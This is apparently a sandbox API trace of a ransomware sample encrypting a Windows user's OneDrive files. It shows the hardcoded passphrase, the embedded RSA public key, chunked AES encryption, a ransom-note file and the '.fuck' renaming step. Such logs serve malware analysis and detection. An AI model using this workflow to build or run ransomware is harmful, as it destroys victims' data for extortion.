AreFileApisANSI () returned 1 [0271.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0271.742] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\af\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0271.744] GetFileType (hFile=0x5d48) returned 0x1 [0271.744] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0271.745] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.745] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0271.745] GetLastError () returned 0x0 [0271.745] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\alertIcon.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\alerticon.png")) returned 0x20 [0271.746] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\alertIcon.png", dwFileAttributes=0x80) returned 1 [0271.746] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\alertIcon.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\alerticon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0271.747] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\alertIcon.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\alerticon.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.749] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\alertIcon.png.gsg", dwFileAttributes=0x2) returned 1 [0271.750] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0271.754] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0271.754] lstrlenA (lpString="aECpWcPppDlAmtrTSptkyOWgzMlQm") returned 29 [0271.754] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.754] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa748) returned 1 [0271.755] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.755] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0271.755] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f27f68) returned 1 [0271.755] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27f68, dwCertEncodingType=0x1, pInfo=0x2f31800*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31830*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31838*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa208) returned 1 [0271.755] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0271.756] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27e58*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f27e58*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0271.756] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f27e58*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f27e58*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0271.757] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x2ce, lpOverlapped=0x0) returned 1 [0271.773] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x2ce, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x2d0) returned 1 [0271.774] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x2d0, lpOverlapped=0x0) returned 1 [0271.777] CloseHandle (hObject=0x5d48) returned 1 [0271.777] CloseHandle (hObject=0x5d3c) returned 1 [0271.778] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\alertIcon.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\alerticon.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\alertIcon.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\alerticon.png"), bFailIfExists=0) returned 1 [0271.781] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\alertIcon.png", dwFileAttributes=0x0) returned 1 [0271.782] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\alertIcon.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\alerticon.png.gsg")) returned 1 [0271.783] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\alertIcon.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\alerticon.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\alertIcon.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\alerticon.png.fuck")) returned 1 [0271.785] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0271.785] CryptDestroyKey (hKey=0x2fa748) returned 1 [0271.785] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0271.785] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.785] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa6c8 [0271.786] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.786] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.786] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0271.786] GetLastError () returned 0x0 [0271.786] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\am-et\\filesync.localizedresources.dll.mui")) returned 0x20 [0271.787] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0271.788] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\am-et\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0271.789] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\am-et\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0271.789] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0271.790] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f27c38) returned 1 [0271.793] CryptCreateHash (in: hProv=0x2f27c38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0271.793] lstrlenA (lpString="aECpWcPppDlAmtrTSptkyOWgzMlQm") returned 29 [0271.793] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.793] CryptDeriveKey (in: hProv=0x2f27c38, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fab88) returned 1 [0271.793] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.793] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0271.793] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f27d48) returned 1 [0271.794] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27d48, dwCertEncodingType=0x1, pInfo=0x2f31ce0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31d10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31d18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fadc8) returned 1 [0271.794] CryptEncrypt (in: hKey=0x2fadc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0271.794] CryptEncrypt (in: hKey=0x2fadc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f284b8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f284b8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0271.794] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f284b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f284b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0271.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.797] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.797] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.798] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.798] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.798] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.799] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.799] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.799] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.816] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.816] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.816] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.816] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.816] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.817] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.817] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.817] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.817] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.817] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.817] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.817] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.817] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.817] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.817] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.818] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.818] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.818] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.818] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.818] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.818] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.818] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.818] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.818] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.819] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.819] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.819] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.819] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.819] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.819] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.819] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.819] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.819] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.819] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.819] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, 